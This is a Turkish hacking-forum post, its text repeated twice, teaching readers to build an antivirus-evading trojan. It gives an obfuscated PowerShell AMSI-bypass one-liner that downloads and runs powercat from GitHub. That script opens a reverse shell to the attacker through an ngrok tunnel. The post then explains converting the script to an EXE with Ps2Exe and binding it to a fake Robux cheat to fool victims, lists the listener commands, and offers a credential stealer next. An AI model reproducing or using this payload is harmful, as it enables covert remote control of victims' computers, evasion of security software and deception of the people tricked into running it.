azazel22
Kayıtlı Üye
- Katılım
- 15 Ocak 2024
- Mesajlar
- 52
- Tepkime puanı
- 70
- Konum
- adana
- İlgi Alanlarınız
-
Siber Güvenlik
Pentest
C Dilleri Python Html Css Js
- Cinsiyet
-
- Erkek
merhaba forum üyeleri
kriptografi gerektirmeyecek kolay bir şekilde %90 fud nasıl yapılır analatacağım. (sadece çok kullanılmayan bazi 1 2 antivirüse takılıyor)
1. Ngrok sitesinden dosyayı indirip icindeki ngrok adlı dosyayı da masaüstüne atıyorsunuz
2. Ngrok sitesinde ki authtoken bölümünden auth tokenimizi alıp
3. Terminalimizde masaüstüne geilyoruz ve başına ./ ekleyerek yapıştırıp enterlıyoruz.
Artık Ngrok Hazır!
Sırada bir bağlantı açmak var.
4. "./ngrok tcp 8000" komutunu girip bir bağlantı açıyoruz.
5. Bu ekrandaki tek işimize yarayacak olan yer forwardingin karşısındaki (ssdeki kırmızı olarak karaladığım yer) tcp://0.tcp.eu.ngrok.io:00000 kısmıdır. Tabii sizde sıfır yazmıcak
Buradaki isteğim sizden tcp:// hariç 0.tcp.eu.ngrok.io kısmını alıp ngrok_host olarak kullanmanız. çift noktadan sonraki 5 basamaklı sayıyıda ngrok_portta kullanmanızdan yöne olur. (çift nokta dahil değil ve ngrok port host nedir diye sormayın altta ona da değineceğim.)
6. Burdan sonrası basit zaten. bir txt dosyası oluşturup alttaki uzun kodu tümüyle kopyalaıp oraya yapıştırın.
ve bu koddaki yani amsibypass base64 kodundaki bazı belli başlı yerleri değiştireceğiz
Amsibypass kodu:
[Ref].Assembly.GetType('Sys'+'te'+'m.Ma'+'na'+'g'+'em'+'ent.Au'+'tom'+'ati'+'on.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQ'+'B'+'tA'+'HM'+'Aa'+'Q'+'BV'+'AH'+'Q'+'Aa'+'QBs'+'AH'+'MA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQ'+'BtA'+'HM'+'A'+'aQB'+'J'+'AG4'+'AaQB'+'0A'+'EYAY'+'Q'+'BpA'+'GwAZ'+'QBk'+'AA=='))),'NonPublic,Static').SetValue($null,$true);IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ngrok_host -p ngrok_port -e cmd
Bu kodda sadece ngrok_ip ve ngrok_portu silip değiştirip ngrok bağlantısında ki o anlattığım ip ve portu gireceksin.
sonra da txt uzantısını ps1 yapacağız. çünkü bu bir powershell kodu
ŞU ANDA ZARARLIMIZ HAZIR! FAKAT;
kimse resmen "ben bir zararlıyım!" diye bağıran yapıdaki bir dosyayı açmaz ne kadar uyarı vs vermiyecek olsa da O YÜZDEN NE YAPACAĞIZ? BU DOSYAYI EXE YAPACAĞIZ.
6. Ps1 dosyalarını exeye dönüştürmemize yarayan bir program var ismi Ps2Exe
allah var çok güzel uygulama
kullanımı çok basit zaten o copyright sürüm vs yerlere sallayın bişiler ama onların bir altındaki tikli kutulardaki ilk tiki kaldırmanız gerekli!
bir exe dosyasıyla (mesela çalışmadığını bildiğiniz gui arayüzlü robux hilesi exe ya da kendinizde de 1 saat falan uğraşarak dandik bişi yapabilirsiniz) bir exeyle birleştirip inandırıcılığı bir üst seviyeye taşıyabilirsiniz.
7. Bağlantı almak için powercat kullanacağız
linux sistemler için "apt install powercat" yeterli olacaktır
bağlantıyı almakta dikkat etmeniz gereken bir husus var.
o da ngrok bağlantısını açarken port olarak ne kullanmışız?
komutumuz "./ngrok tcp 8000" yani bizim 8000 portunu dinlemeye almamız lazım.
bu durumda kullanacağımız komut
"powercat -l -p 8000 "
ama şöyle bir durum var eğer ki sürekli log bekleyip logun ne zaman düşeceğinden emin değilseniz sürekli açık kalmasını istiyorsanız
"powercat -l -p 8000 -rep"
kullanımı daha uygun olur. rep komutuyla birlikte zaman aşımı derdini ortadan kaldırırsınız.
İŞTE SONUÇ
derseniz ki bize grabber stealer tarzı bişiler lazım o zamanda bu yapılan trojan sayesinde özel kodlar kullanarak defenderi bypasslayıp ne kadar boktan fudu olan bir grabber stealer olursa olsun sisteme sokup tüm hesap ve bilgi loglarını almayı da gösterebilirim. Tabii eğer ki güzel bir tepki gelirse.
aynı zamanda bir oyun hilesi ya da herhangi bir exeye bu yaptığımız exeyi nasıl gizleyebiliriz gibi konuları da çok tepki gelirse anlatmak isterim.
kriptografi bilmeden en fazla bu kadar fudlayabilirsiniz. (ücretli ya da cracklenip sunulan fudlama programları hariç tabii ki)
İYİ RATLAMALAR :*
kriptografi gerektirmeyecek kolay bir şekilde %90 fud nasıl yapılır analatacağım. (sadece çok kullanılmayan bazi 1 2 antivirüse takılıyor)
1. Ngrok sitesinden dosyayı indirip icindeki ngrok adlı dosyayı da masaüstüne atıyorsunuz
2. Ngrok sitesinde ki authtoken bölümünden auth tokenimizi alıp
3. Terminalimizde masaüstüne geilyoruz ve başına ./ ekleyerek yapıştırıp enterlıyoruz.
Artık Ngrok Hazır!
Sırada bir bağlantı açmak var.
4. "./ngrok tcp 8000" komutunu girip bir bağlantı açıyoruz.
5. Bu ekrandaki tek işimize yarayacak olan yer forwardingin karşısındaki (ssdeki kırmızı olarak karaladığım yer) tcp://0.tcp.eu.ngrok.io:00000 kısmıdır. Tabii sizde sıfır yazmıcak
Buradaki isteğim sizden tcp:// hariç 0.tcp.eu.ngrok.io kısmını alıp ngrok_host olarak kullanmanız. çift noktadan sonraki 5 basamaklı sayıyıda ngrok_portta kullanmanızdan yöne olur. (çift nokta dahil değil ve ngrok port host nedir diye sormayın altta ona da değineceğim.)
6. Burdan sonrası basit zaten. bir txt dosyası oluşturup alttaki uzun kodu tümüyle kopyalaıp oraya yapıştırın.
ve bu koddaki yani amsibypass base64 kodundaki bazı belli başlı yerleri değiştireceğiz
Amsibypass kodu:
[Ref].Assembly.GetType('Sys'+'te'+'m.Ma'+'na'+'g'+'em'+'ent.Au'+'tom'+'ati'+'on.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQ'+'B'+'tA'+'HM'+'Aa'+'Q'+'BV'+'AH'+'Q'+'Aa'+'QBs'+'AH'+'MA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQ'+'BtA'+'HM'+'A'+'aQB'+'J'+'AG4'+'AaQB'+'0A'+'EYAY'+'Q'+'BpA'+'GwAZ'+'QBk'+'AA=='))),'NonPublic,Static').SetValue($null,$true);IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ngrok_host -p ngrok_port -e cmd
Bu kodda sadece ngrok_ip ve ngrok_portu silip değiştirip ngrok bağlantısında ki o anlattığım ip ve portu gireceksin.
sonra da txt uzantısını ps1 yapacağız. çünkü bu bir powershell kodu
ŞU ANDA ZARARLIMIZ HAZIR! FAKAT;
kimse resmen "ben bir zararlıyım!" diye bağıran yapıdaki bir dosyayı açmaz ne kadar uyarı vs vermiyecek olsa da O YÜZDEN NE YAPACAĞIZ? BU DOSYAYI EXE YAPACAĞIZ.
6. Ps1 dosyalarını exeye dönüştürmemize yarayan bir program var ismi Ps2Exe
allah var çok güzel uygulama
kullanımı çok basit zaten o copyright sürüm vs yerlere sallayın bişiler ama onların bir altındaki tikli kutulardaki ilk tiki kaldırmanız gerekli!
bir exe dosyasıyla (mesela çalışmadığını bildiğiniz gui arayüzlü robux hilesi exe ya da kendinizde de 1 saat falan uğraşarak dandik bişi yapabilirsiniz) bir exeyle birleştirip inandırıcılığı bir üst seviyeye taşıyabilirsiniz.
7. Bağlantı almak için powercat kullanacağız
linux sistemler için "apt install powercat" yeterli olacaktır
bağlantıyı almakta dikkat etmeniz gereken bir husus var.
o da ngrok bağlantısını açarken port olarak ne kullanmışız?
komutumuz "./ngrok tcp 8000" yani bizim 8000 portunu dinlemeye almamız lazım.
bu durumda kullanacağımız komut
"powercat -l -p 8000 "
ama şöyle bir durum var eğer ki sürekli log bekleyip logun ne zaman düşeceğinden emin değilseniz sürekli açık kalmasını istiyorsanız
"powercat -l -p 8000 -rep"
kullanımı daha uygun olur. rep komutuyla birlikte zaman aşımı derdini ortadan kaldırırsınız.
İŞTE SONUÇ
derseniz ki bize grabber stealer tarzı bişiler lazım o zamanda bu yapılan trojan sayesinde özel kodlar kullanarak defenderi bypasslayıp ne kadar boktan fudu olan bir grabber stealer olursa olsun sisteme sokup tüm hesap ve bilgi loglarını almayı da gösterebilirim. Tabii eğer ki güzel bir tepki gelirse.
aynı zamanda bir oyun hilesi ya da herhangi bir exeye bu yaptığımız exeyi nasıl gizleyebiliriz gibi konuları da çok tepki gelirse anlatmak isterim.
kriptografi bilmeden en fazla bu kadar fudlayabilirsiniz. (ücretli ya da cracklenip sunulan fudlama programları hariç tabii ki)
İYİ RATLAMALAR :*